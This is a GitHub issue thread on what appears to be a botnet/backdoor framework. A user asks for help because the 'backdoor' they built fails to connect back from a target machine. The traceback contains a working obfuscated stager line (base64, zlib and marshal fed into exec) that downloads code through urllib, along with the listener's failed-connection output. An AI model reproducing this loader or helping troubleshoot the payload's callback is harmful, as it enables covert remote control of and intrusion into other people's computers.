### ISSUE TITLE
Failed Connection when i run it to target machine

### ISSUE THREAD

**Issue by ricko2991** [malwaredllc/byob#256]
**Hi, can you help me, 
when i create executable and i run it into target machine the error is like this:**
D:\>python VIRUS.py                              " => my backdoor "
Traceback (most recent call last):
  File "VIRUS.py", line 5, in <module>    exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrtmZgYCgtyskvSM3TUM8oKSmw0tc3tDTSMzSz0DMx1jM2sTI0MjbV1y8uSUxPLSrWz8811yuoVNfUK0pNTNHQBAA+UhIO')))))
  File "<string>", line 1, in <module>
  File "C:\Users\ASUS\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
  File "C:\Users\ASUS\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 525, in open
    response = self._open(req, data)
  File "C:\Users\ASUS\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 542, in _open
    result = self._call_chain(self.handle_open, protocol, protocol +
  File "C:\Users\ASUS\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 502, in _call_chain
    result = func(*args)
  File "C:\Users\ASUS\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 1379, in http_open
    return self.do_open(http.client.HTTPConnection, req)
  File "C:\Users\ASUS\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 1354, in do_open
    r = h.getresponse()
  File "C:\Users\ASUS\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 1332, in getresponse
    response.begin()
  File "C:\Users\ASUS\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 303, in begin
    version, status, reason = self._read_status()
  File "C:\Users\ASUS\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 285, in _read_status
    raise BadStatusLine(line)
http.client.BadStatusLine: uËþJÿõÌ$a£"><Îð`-®PâdiôKC¾V¸íiÝUj"«Lì1Ê;z$! Î©5¦kÉ­i"TÃµrSª¦Iþ/z:&âË·dB4íX{v'<a µç+è×ÙlR<¿6&õ¶t¦bC*íÜqBûÖW+µ¥W»tÑÕØdÂ=²ë.½>´¿]¡ìO3ÒXìÐzÐlþHE¢Ô¯¬ôê{ëEñÂckRç¸®ÊMKn¬E¯v4

**and when i open listener on server.py use my ip address and the port that i gave. The message is:**

[user @ /home/user/byob/byob]>Session init exception: unpack requires a string argument of length 4

[-] Failed Connection: 192.168.1.137

**Comment by Artucuno** [comment]
What was your fix?
